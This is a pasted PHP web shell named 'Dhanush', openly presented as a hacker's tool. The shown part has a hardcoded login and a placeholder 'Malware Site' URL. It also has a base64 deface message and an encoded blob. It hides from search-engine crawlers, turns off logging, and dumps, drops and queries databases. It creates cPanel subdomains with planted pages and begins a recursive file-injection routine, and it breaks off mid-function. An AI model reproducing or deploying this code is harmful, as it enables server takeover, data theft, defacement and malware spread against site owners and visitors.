· 9 years ago · Nov 24, 2016, 06:24 AM
1<?php
2//========================================//
3//========+++Dhanush+++==========//
4//========================================//
5//====+++Coded By Arjun+++===//
6//========================================//
7//=====+++An Indian Hacker+++=====//
8//========================================//
9//====Magh-2070/Feb-2014====//
10
11// Set Username & Password
12$user = "Dhanush";
13$pass = "Dhanush";
14
15$malsite = "http://jolygoestobeinvester.ru/"; // Malware Site
16$ind = "WW91IGp1c3QgZ290IGhhY2tlZCAhISEhIQ=="; // "Deface Page" Base64 encoded "You Just Got Hacked !!"
17$bgimage = 'http://www.datadiary.com/UserFiles/Wallpaper/holy/Org201204050407061198000.jpg'; // Background Image
18$my_shell_style = "dhanush"; // "phizo", "dhanush", "404", "orange"
19
20$curfile = __FILE__;
21
22$plsym = "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";
23
24@set_magic_quotes_runtime(0);
25@ini_set('error_log',NULL);
26@ini_set('log_errors',0);
27ob_start();
28error_reporting(0);
29@set_time_limit(0);
30@ini_set('max_execution_time',0);
31@ini_set('output_buffering',0);
32
33if(!empty($_SERVER['HTTP_USER_AGENT']))
34{
35 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
36 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
37 header('HTTP/1.0 404 Not Found');
38 exit; }
39}
40// Dump Database
41if($_GET["action"] == "dumpDB")
42{
43 $self=$_SERVER["PHP_SELF"];
44 if(isset($_COOKIE['dbserver']))
45 {
46 $date = date("Y-m-d");
47 $dbserver = $_COOKIE["dbserver"];
48 $dbuser = $_COOKIE["dbuser"];
49 $dbpass = $_COOKIE["dbpass"];
50 $dbname = $_GET['dbname'];
51 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
52
53 $file = "Dump-$dbname-$date";
54
55 $file="Dump-$dbname-$date.sql";
56 $fp = fopen($file,"w");
57
58 function write($data)
59 {
60 global $fp;
61
62 fwrite($fp,$data);
63
64 }
65 mysql_connect ($dbserver, $dbuser, $dbpass);
66 mysql_select_db($dbname);
67 $tables = mysql_query ("SHOW TABLES");
68 while ($i = mysql_fetch_array($tables))
69 {
70 $i = $i['Tables_in_'.$dbname];
71 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
72 write($create['Create Table'].";");
73 $sql = mysql_query ("SELECT * FROM ".$i);
74 if (mysql_num_rows($sql)) {
75 while ($row = mysql_fetch_row($sql)) {
76 foreach ($row as $j => $k) {
77 $row[$j] = "'".mysql_escape_string($k)."'";
78 }
79 write("INSERT INTO $i VALUES(".implode(",", $row).");");
80 }
81 }
82 }
83
84 fclose ($fp);
85
86 header("Content-Disposition: attachment; filename=" . $file);
87 header("Content-Type: application/download");
88 header("Content-Length: " . filesize($file));
89 flush();
90
91 $fp = fopen($file, "r");
92 while (!feof($fp))
93 {
94 echo fread($fp, 65536);
95 flush();
96 }
97 fclose($fp);
98 }
99}
100$hs_dhanush = "<style type=\"text/css\">
101<!--
102
103body,td,th {
104 color: #FF0000;
105 font-size: 14px;
106}
107tr:hover.lines
108{
109background-color:#000000;}
110tr.lines
111{
112background-color:#0C0C0C;}
113div.fixedbox
114{
115 width:70%;
116 padding:8px;
117 background-color:#171717;
118 position:fixed;
119 left:15%;
120 top:120px;
121 box-shadow: 0px 0px 10px #000;
122 -moz-border-radius: 5px 5px 5px 5px;
123 -webkit-border-radius: 5px 5px 5px 5px;
124 border-radius: 5px 5px 5px 5px;
125}
126div.logindiv{
127background-color:#171717; }
128table.btmtbl{
129border-collapse:collapse;
130border-color:red;}
131td.btmtbl{
132border-color:red;}
133input.but {
134 background-color:#000000;
135 color:#FF0000;
136 border : 1px solid #1B1B1B;
137}
138a:link {
139 color: #00FF00;
140 text-decoration:none;
141 font-weight:500;
142}
143a:hover {
144 color:#00FF00;
145 text-decoration:underline;
146}
147font.txt
148{
149 color: #00FF00;
150 text-decoration:none;
151 font-size:14px;
152}
153font.om
154{
155 color: #00FF00;
156}
157/* Write Permission Font */
158font.wrtperm
159{
160 color:#00FF00;
161}
162/* Read Permission Font */
163font.readperm
164{
165 color:#FF0000;
166}
167/* No Permission Font */
168font.noperm
169{
170 color:#FFFFFF;
171}
172font.mainmenu
173{
174 color:#FF0000;
175 text-decoration:none;
176 font-size:14px;
177}
178a:visited {
179 color: #FF0000;
180}
181input.box
182{
183 background-color:#0C0C0C;
184 color: lime;
185 border : 1px solid #1B1B1B;
186 -moz-border-radius:6px;
187 width:400;
188 border-radius:6px;
189}
190input.sbox
191{
192 background-color:#0C0C0C;
193 color: lime;
194 border : 1px solid #1B1B1B;
195 -moz-border-radius:6px;
196 width:180;
197 border-radius:6px;
198}
199select.sbox
200{
201 background-color:#0C0C0C;
202 color: lime;
203 border : 1px solid #1B1B1B;
204 -moz-border-radius:6px;
205 width:180;
206 border-radius:6px;
207}
208select.box
209{
210 background-color:#0C0C0C;
211 color: lime;
212 border : 1px solid #1B1B1B;
213 -moz-border-radius:6px;
214 width:400;
215 border-radius:6px;
216}
217
218textarea.box
219{
220 border : 3px solid #111;
221 background-color:#161616;
222 color : lime;
223 margin-top: 10px;
224 -moz-border-radius:7px;
225 border-radius:7px;
226}
227body {
228 background-color:#000000;
229}
230.myphp table
231{
232 width:100%;
233 padding:18px 10px;
234 border : 1px solid #1B1B1B;
235}
236.myphp td
237{
238 background:#111111;
239 color:#00ff00;
240 padding:6px 8px;
241 border-bottom:1px solid #222222;
242 font-size:14px;
243}
244.myphp th, th
245{
246 background:#181818;
247
248}
249-->
250</style>";
251$hs_orange = "<style type=\"text/css\">
252<!--
253body {
254background-image:url($bgimage);
255background-color:#000000;
256background-repeat:no-repeat;
257background-attachment:fixed;
258}
259/* Shell Title Color*/
260span.headtitle
261{
262 color:#F90;
263 text-decoration:none;
264
265}
266/* Login Page div*/
267div.logindiv
268{
269background-color:#000000;
270opacity:0.5;
271width:50%;
272border-radius:7px;
273margin-top:150px;
274-moz-border-radius:25px;
275height:410px;
276border: solid 1px
277#878787;
278border-radius: 13px;
279box-shadow: 0px 0px 10px
280black;
281}
282div.fixedbox
283{
284 width:70%;
285 padding:8px;
286 background-color:#171717;
287 position:fixed;
288 left:15%;
289 top:120px;
290 box-shadow: 0px 0px 35px #000;
291 -moz-border-radius: 5px 5px 5px 5px;
292 -webkit-border-radius: 5px 5px 5px 5px;
293 border-radius: 5px 5px 5px 5px;
294}
295table.tbl
296{
297border:#F90;
298}
299body,td,th {
300 color: #F90;
301 font-size: 14px;
302}
303table.btmtbl{
304border-collapse:collapse;
305border-color:#F90;}
306td.btmtbl{
307border-color:#F90;}
308/* Present Working Directory Table */
309table.pwdtbl
310{
311 border-color:#F90;
312}
313/* File List Hover */
314tr.lines:hover
315{
316background-color:#666666;
317opacity:0.5;
318}
319/* File List */
320tr.lines
321{
322 height:12px;
323}
324/* Functions Config */
325td.myfun
326{
327 display: inline;
328 padding: 1px;
329 margin: 5px;
330 border: 1px solid #AAA;
331 border-radius: 4px;
332 -moz-border-radius:4px;
333 box-shadow: 0px 0px 2px #000;
334}
335/* Functions Config Hover */
336td.myfun:hover
337{
338 box-shadow: 0px 0px 2px #FF0;
339}
340/* Button Config */
341input.but {
342 border: 1px solid #F90;
343 background-color:#000000;
344 color:#FFFFFF;
345
346 box-shadow: 0px 0px 2px #F90 inset;
347}
348/* Link Config */
349a:link {
350 color: #F90;
351 text-decoration:none;
352 font-weight:500;
353}
354/* Link Config Hover */
355a:hover {
356 color:#666666;
357 text-decoration:underline;
358}
359/* Link Config Visited */
360a:visited {
361 color: #F90;
362 text-decoration:none;
363}
364/* font Config */
365font.txt
366{
367 color: #FFFFFF;
368 text-decoration:none;
369 font-size:13px;
370}
371font.om
372{
373 color: #F90;
374}
375/* Function Font Config */
376font.fun
377{
378 color:#F90;
379}
380/* Write Permission Font */
381font.wrtperm
382{
383 color:#F90;
384}
385/* Read Permission Font */
386font.readperm
387{
388 color:#FF0000;
389}
390/* No Permission Font */
391font.noperm
392{
393 color:#FFFFFF;
394}
395/* Upload File Config */
396input.upld
397{
398 width:400;
399 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
400}
401/* Input TextBox Config */
402input.box
403{
404 width:400;
405 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
406}
407/* Input Small TextBox Config */
408input.sbox
409{
410 width:180;
411 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
412}
413/* Input Small SelectBox Config */
414select.sbox
415{
416 width:180;
417 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
418}
419/* Input SelectBox Config */
420select.box
421{
422 width:400;
423 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
424}
425/* TextArea Config */
426textarea.box
427{
428 border: 1px solid #F90;
429 color:#FFFFFF;
430 margin-top: 10px;
431 box-shadow: 0px 0px 3px #F90 inset;
432 background-color: #000000;
433 opacity: 0.50;
434}
435.myphp table
436{
437 width:100%;
438 padding:18px 10px;
439 border: 1px solid #F90;
440}
441.myphp td
442{
443 padding:6px 8px;
444 border-bottom:1px solid #222222;
445 font-size:14x;
446}
447
448-->
449</style>";
450$hs_404 = "<style type=\"text/css\">
451<!--
452span.headtitle
453{
454 color:#00ff00;
455 text-decoration:none;
456
457}
458body, th{
459 color:#00ff00;
460 background-color:#000000;
461 font-size: 13px;
462}
463div.logindiv{
464background-color:#171717; }
465div.fixedbox
466{
467 width:70%;
468 padding:8px;
469 background-color:#171717;
470 position:fixed;
471 left:15%;
472 top:120px;
473 box-shadow: 0px 0px 35px #000;
474 -moz-border-radius: 5px 5px 5px 5px;
475 -webkit-border-radius: 5px 5px 5px 5px;
476 border-radius: 5px 5px 5px 5px;
477}
478table.tbl
479{
480border:#00ff00;
481}
482table.btmtbl{
483border-collapse:collapse;
484border-color:lime;}
485td.btmtbl{
486border-color:lime;}
487tr.lines:hover
488{
489 background-color:#5e5e5e;
490}
491tr.lines
492{
493 background-color:#000000;
494 height:12px;
495 font-size: 14px;
496}
497td.myfun
498{
499 border-style:none;
500 margin: 5px;
501}
502td.myfun:hover
503{
504 box-shadow: 0px 0px 2px #FF0;
505}
506input.but {
507 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
508}
509a:link {
510 color: #00ff00;
511 text-decoration:none;
512 font-weight:500;
513}
514a:visited
515{
516color:#00ff00;
517}
518a:hover {
519 background:#ff0000;
520}
521font.mainmenu
522{
523 font-size:14px;
524}
525font.txt
526{
527 color: #FFFFFF;
528 text-decoration:none;
529 font-size:13px;
530}
531font.om
532{
533 color:#00FF00;
534}
535font.fun
536{
537
538 color:#00ff00;
539}
540font.wrtperm
541{
542 color:#00ff00;
543}
544font.readperm
545{
546 color:#FF0000;
547}
548font.noperm
549{
550 color:#FFFFFF;
551}
552input.upld
553{
554 width:400;
555 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
556}
557input.box
558{
559 width:400;
560 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
561}
562input.sbox
563{
564 width:180;
565 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
566}
567select.sbox
568{
569 width:180;
570 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
571}
572select.box
573{
574 width:400;
575 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
576}
577
578textarea.box
579{
580 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
581}
582.myphp table
583{
584 width:100%;
585 padding:18px 10px;
586 border : 1px solid #00FF00;
587}
588.myphp td
589{
590 background:#111111;
591 color:#00ff00;
592 padding:6px 8px;
593 border-bottom:1px solid #222222;
594 font-size:13px;
595}
596.myphp th,
597{
598 background:#181818;
599
600}
601-->
602</style>";
603$hs_phizo = "<style type=\"text/css\">
604<!--
605span.headtitle
606{
607 color:#000000;
608 text-decoration:none;
609
610}
611div.logindiv
612{
613background-color:#CCC;
614width:50%;
615border-radius:7px;
616margin-top:150px;
617-moz-border-radius:25px;
618height:410px;
619border: solid 1px
620#878787;
621border-radius: 13px;
622box-shadow: 0px 0px 10px
623black;
624}
625div.fixedbox
626{
627 width:70%;
628 padding:8px;
629 background-color:#999999;
630 position:fixed;
631 left:15%;
632 top:120px;
633 box-shadow: 0px 0px 10px #000;
634 -moz-border-radius: 5px 5px 5px 5px;
635 -webkit-border-radius: 5px 5px 5px 5px;
636 border-radius: 5px 5px 5px 5px;
637}
638body,td,th {
639 color: #000000;
640 font-size: 14px;
641}
642table.pwdtbl
643{
644 width:95%;
645 background-color:#999999;
646 -moz-border-radius:25px;
647 border-radius:25px;
648}
649table#maintable
650{
651 background-color: #999999;
652 border: solid 1px #878787;
653 border-radius: 13px;
654 box-shadow: 0px 0px 10px #000;
655 width: 100%;
656 margin: auto;
657 height: auto;
658}
659tr.lines:hover
660{
661background-color:#C0C0C0;
662}
663tr.lines
664{
665 background-color:#999999;
666 height:12px;
667}
668td.myfun
669{
670 display: inline;
671 padding: 1px;
672 margin: 5px;
673 border: 1px solid #AAA;
674 border-radius: 4px;
675 -moz-border-radius:4px;
676 box-shadow: 0px 0px 2px #000;
677}
678td.myfun:hover
679{
680 box-shadow: 0px 0px 2px #FF0;
681}
682input.but {
683 border: 1px solid #787878;
684 border-radius: 5px;
685 box-shadow: 0px 0px 2px #000 inset;
686}
687a:link,a:visited {
688 color: #000000;
689 text-decoration:none;
690 font-weight:500;
691}
692a:hover {
693 color:#666666;
694 text-decoration:underline;
695}
696font.mainmenu
697{
698 display: inline;
699 padding: 1px;
700 border: 1px solid #AAA;
701 border-radius: 4px;
702 box-shadow: 0px 0px 2px #000;
703 text-decoration: none;
704 font-weight: bold;
705 color: #696969;
706}
707font.txt
708{
709 color: #000000;
710 text-decoration:none;
711 font-size:13px;
712}
713font.om
714{
715 color:#000000;
716}
717font.fun
718{
719 color: #696969;
720}
721font.wrtperm
722{
723 color:#000000;
724}
725font.readperm
726{
727 color:#000000;
728}
729font.noperm
730{
731 color:#000000;
732}
733input.upld
734{
735 border: 1px solid #787878;
736 box-shadow: 0px 0px 3px #000 inset;
737 background-color: #AAA;
738 font-family: Courier;
739 -moz-border-radius:6px;
740 width:400;
741 border-radius:6px;
742}
743input.box
744{
745 border: 1px solid #787878;
746 box-shadow: 0px 0px 3px #000 inset;
747 background-color: #AAA;
748 font-family: Courier;
749 -moz-border-radius:6px;
750 width:400;
751 border-radius:6px;
752}
753input.sbox
754{
755 border: 1px solid #787878;
756 box-shadow: 0px 0px 3px #000 inset;
757 background-color: #AAA;
758 font-family: Courier;
759 -moz-border-radius:6px;
760 width:180;
761 border-radius:6px;
762}
763select.sbox
764{
765 border: 1px solid #787878;
766 box-shadow: 0px 0px 3px #000 inset;
767 background-color: #AAA;
768 font-family: Courier;
769 -moz-border-radius:6px;
770 width:180;
771 border-radius:6px;
772}
773select.box
774{
775 border: 1px solid #787878;
776 box-shadow: 0px 0px 3px #000 inset;
777 background-color: #AAA;
778 font-family: Courier;
779 -moz-border-radius:6px;
780 width:400;
781 border-radius:6px;
782}
783
784textarea.box
785{
786 border: 1px solid #787878;
787 margin-top: 10px;
788 -moz-border-radius:7px;
789 box-shadow: 0px 0px 3px #000 inset;
790 background-color: #AAA;
791}
792textarea:focus
793{
794 box-shadow: 0px 0px 3px #FF0 inset;
795}
796body {
797 background-color:#C0C0C0;
798}
799.myphp table
800{
801 width:100%;
802 padding:18px 10px;
803 border : 1px solid #1B1B1B;
804}
805.myphp td
806{
807 /*background:#111111; */
808 color:#000000;
809 padding:6px 8px;
810 border-bottom:1px solid #222222;
811 font-size:14px;
812}
813.myphp th, th
814{
815 background:#999999;
816
817}
818-->
819</style>";
820
821 if($_COOKIE['style']=='dhanush')
822 $shellstyle = $hs_dhanush;
823 elseif($_COOKIE['style']=='404')
824 $shellstyle = $hs_404;
825 elseif($_COOKIE['style']=='orange')
826 $shellstyle = $hs_orange;
827 elseif($_COOKIE['style']=='phizo')
828 $shellstyle = $hs_phizo;
829 else
830 {
831 if($my_shell_style == "phizo")
832 $shellstyle = $hs_phizo;
833 elseif($my_shell_style=='dhanush')
834 $shellstyle = $hs_dhanush;
835 elseif($my_shell_style=='404')
836 $shellstyle = $hs_404;
837 elseif($my_shell_style=='orange')
838 $shellstyle = $hs_orange;
839 }
840if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass))
841{
842 $self=$_SERVER["PHP_SELF"];
843 $os = "N/D";
844 $bdmessage = null;
845 $dir = getcwd();
846
847 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
848 $path=explode('/',$url);
849 $curr_url =str_replace($path[count($path)-1],'',$url);
850
851 if(strtolower(substr(PHP_OS,0,3)) == "win")
852 {
853 $SEPARATOR = '\\';
854 $os = "Windows";
855 $directorysperator="\\";
856 }
857 else
858 {
859 $os = "Linux";
860 $directorysperator='/';
861 }
862 function Trail($d,$directsperator)
863 {
864 $d=explode($directsperator,$d);
865 array_pop($d);
866 array_pop($d);
867 $str=implode($d,$directsperator);
868 return $str;
869 }
870
871 function randomt()
872 {
873 $chars = "abcdefghijkmnopqrstuvwxyz023456789";
874 srand((double)microtime()*1000000);
875 $i = 0;
876 $pass = '' ;
877
878 while ($i <= 7)
879 {
880 $num = rand() % 33;
881 $tmp = substr($chars, $num, 1);
882 $pass = $pass . $tmp;
883 $i++;
884 }
885 return $pass;
886 }
887 function make_subdomain($subDomain,$cPanelUser,$cPanelPass,$subindex)
888 {
889 $rootDomain = $_SERVER['SERVER_NAME'];
890 $buildRequest = "/frontend/x3/subdomain/doadddomain.html?rootdomain=" . $rootDomain . "&domain=" . $subDomain . "&dir=public_html/" . $subDomain;
891
892 $openSocket = fsockopen('localhost',2082);
893 if(!$openSocket) {
894 return "Socket error<BR>";
895 }
896
897 $authString = $cPanelUser . ":" . $cPanelPass;
898 $authPass = base64_encode($authString);
899 $buildHeaders = "GET " . $buildRequest ."\r\n";
900 $buildHeaders .= "HTTP/1.0\r\n";
901 $buildHeaders .= "Host:localhost\r\n";
902 $buildHeaders .= "Authorization: Basic " . $authPass . "\r\n";
903 $buildHeaders .= "\r\n";
904
905 fputs($openSocket, $buildHeaders);
906 while(!feof($openSocket)) {
907 fgets($openSocket,128);
908 }
909 fclose($openSocket);
910 // create index file
911 @chdir($subDomain);
912 $file5 = fopen("index.html","w");
913 fputs($file5,$subindex);
914 fclose($file5);
915 $newDomain = "http://" . $subDomain . "." . $rootDomain . "/<BR>";
916
917 return $newDomain;
918}
919
920 // Database functions
921 function listdatabase()
922 {
923 $self=$_SERVER["PHP_SELF"];
924 ?>
925 <br>
926 <form>
927 <table>
928 <tr>
929 <td><input type="text" class="box" name="dbname"></td>
930 <td><input type="button" onClick="viewtables('createDB',dbname.value)" value=" Create Database " class="but"></td>
931 </tr>
932 </table>
933 </form>
934 <br>
935 <?php
936 $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
937 $result = mysql_query("SHOW DATABASE");
938 echo "<table class=btmtbl cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
939
940 $pDB = mysql_list_dbs( $mysqlHandle );
941 $num = mysql_num_rows( $pDB );
942 for( $i = 0; $i < $num; $i++ )
943 {
944 $dbname = mysql_dbname( $pDB, $i );
945 mysql_select_db($dbname,$mysqlHandle);
946 $result = mysql_query("SHOW TABLES");
947 $num_of_tables = mysql_num_rows($result);
948 echo "<tr>\n";
949 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\"><font size=3>$dbname</font></a> ($num_of_tables)</td>\n";
950 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\">Tables</a></td>\n";
951 echo "<td><a href=# onClick=\"viewtables('dropDB','$dbname')\">Drop</a></td>\n";
952 echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
953 echo "</tr>\n";
954 }
955 echo "</table>\n";
956 mysql_close($mysqlHandle);
957 }
958
959 function listtable()
960 {
961 $self=$_SERVER["PHP_SELF"];
962 $dbserver = $_COOKIE["dbserver"];
963 $dbuser = $_COOKIE["dbuser"];
964 $dbpass = $_COOKIE["dbpass"];
965 $dbname = $_GET['dbname'];
966 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
967 ?>
968 <br><br>
969 <form>
970 <table>
971
972 <tr>
973 <td><input type="text" class="box" name="tablename"></td>
974 <td><input type="button" onClick="viewtables('createtable','<?php echo $_GET['dbname'];?>')" value=" Create Table " name="createmydb" class="but"></td>
975 </tr>
976 </table>
977
978 <br>
979 <form>
980 <table>
981 <tr>
982 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
983 </tr>
984 <tr>
985 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
986 </tr>
987 </table>
988 </form>
989
990 <?php
991
992 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
993
994 mysql_select_db($dbname);
995 $pTable = mysql_list_tables( $dbname );
996
997 if( $pTable == 0 ) {
998 $msg = mysql_error();
999 echo "<h3>Error : $msg</h3><p>\n";
1000 return;
1001 }
1002 $num = mysql_num_rows( $pTable );
1003
1004 echo "<table class=btmtbl cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
1005
1006 for( $i = 0; $i < $num; $i++ )
1007 {
1008 $tablename = mysql_tablename( $pTable, $i );
1009 $result = mysql_query("select * from $tablename");
1010 $num_rows = mysql_num_rows($result);
1011 echo "<tr>\n";
1012 echo "<td>\n";
1013 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\"><font size=3>$tablename</font></a> ($num_rows)\n";
1014 echo "</td>\n";
1015 echo "<td>\n";
1016 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\">Schema</a>\n";
1017 echo "</td>\n";
1018 echo "<td>\n";
1019 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\">Data</a>\n";
1020 echo "</td>\n";
1021 echo "<td>\n";
1022 echo "<a href=# onClick=\"viewtables('empty','$dbname','$tablename')\">Empty</a>\n";
1023 echo "</td>\n";
1024 echo "<td>\n";
1025 echo "<a href=# onClick=\"viewtables('dropTable','$dbname','$tablename')\">Drop</a>\n";
1026 echo "</td>\n";
1027 echo "</tr>\n";
1028 }
1029
1030 echo "</table></form>";
1031 mysql_close($mysqlHandle);
1032 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
1033 }
1034
1035
1036 function paramexe($n, $v)
1037 {
1038 $v = trim($v);
1039 if($v)
1040 {
1041 echo '<span><font size=3>' . $n . ': </font></span>';
1042 if(strpos($v, "\n") === false)
1043 echo '<font size=2>' . $v . '</font><br>';
1044 else
1045 echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
1046 }
1047 }
1048 $mycount = 0;
1049 function injectdir($dir,$filetype,$mode,$lolinject)
1050 {
1051 global $curfile,$mycount;
1052 if (is_dir($dir))
1053 {
1054 $objects = scandir($dir);
1055 foreach ($objects as $object)
1056 {
1057 if ($object != '.' && $object != '..' && strpos($dir, 'dhanush') == false && strpos($dir, 'sym') == false)
1058 {
1059 if (is_dir($dir . '/' . $object))
1060 {
1061 // if we find a directory, do a recursive call
1062 injectdir($dir . '/' . $object,$filetype,$mode,$lolinject);
1063 }
1064 else
1065 {
1066 $file_parts = pathinfo($object);
